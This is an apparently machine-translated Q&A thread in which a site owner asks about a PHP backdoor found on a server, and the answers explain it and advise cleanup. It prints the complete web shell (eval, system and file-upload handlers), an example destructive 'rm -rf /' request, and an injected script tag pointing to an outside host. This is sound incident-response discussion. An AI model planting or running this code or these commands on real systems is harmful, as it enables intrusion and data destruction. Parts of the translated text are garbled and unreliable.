[英]What's the purpose of this PHP code/hack.?
我最近在我的服务器上发现了4个奇怪的文件(我没有上传)。 文件名是这样的:goog1e7a20543b128921.php
这里是他们内部的代码:
Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
你知道这个代码应该做什么吗? 我应该开始恐慌吗?
谢谢。
是的,这是恶意代码。 这个shell脚本将允许执行代码以及上传任何文件是攻击者知道传递给它的参数。 我建议在所有文件中搜索该代码,验证文件权限并更改密码以防万一。
我建议你使用HTML Purifier或OWASP来使事情变得更加安全。
如果你没有使用它,你必须禁用eval
结构(除非你真的需要,否则你不应该这样做)。
使用以下方法分析任何安全漏洞的服务器设置:
(来源: phpsec.org )
它是您的网络服务器的后门。
它允许攻击者向http://you.com/goog1e7a20543b128921.php?s=rm -rf /
发送请求以删除整个系统。
然后,您应该对您的网站进行彻底的安全审查,以确定他们是如何到达那里的。
以供参考:
if($e){eval($e);}
这允许攻击者执行他们想要的任何PHP命令。
if($s){system($s);}
这允许攻击者执行他们想要的任何系统命令,就像您的Web服务器运行的任何用户一样。
if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}
这允许攻击者上传他们想要的任何文件 - 再次是您的网络服务器运行的用户,以确定文件权限。
总之,恐慌:-p
我确信网上有很多关于如何处理这个问题的文章。 简而言之,在以后备份系统进行分析,从头开始重新安装服务器(你不知道他们对你做了什么,所以只是删除文件还不够好。)同时试图弄清楚他们是如何进入的插上洞。
eval($ e) - 远程执行命令系统 - eq。 for listind directory $ _FILES ['f'] ['name'] - 用于上传脚本到服务器eq hack工具等
显然你不是唯一拥有这些的人。 谷歌搜索它真的很快,其他网站似乎也被感染了。 它看起来像被感染文件一直存储在images文件夹中。
相关:尝试将来安装phpAntiVirus,并询问您的提供商mod_security。 这可能会减轻未来的攻击。 无论如何,这些文件并没有在您的服务器上实现。 摆脱所有旧的PHP应用程序。
在每个文件中查找。 <script src="http://nt02.co.in/3"></script>
如果您找到使用ftp的文件,请查看文件修改日期并打开该日期修改的所有文件并将其删除。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.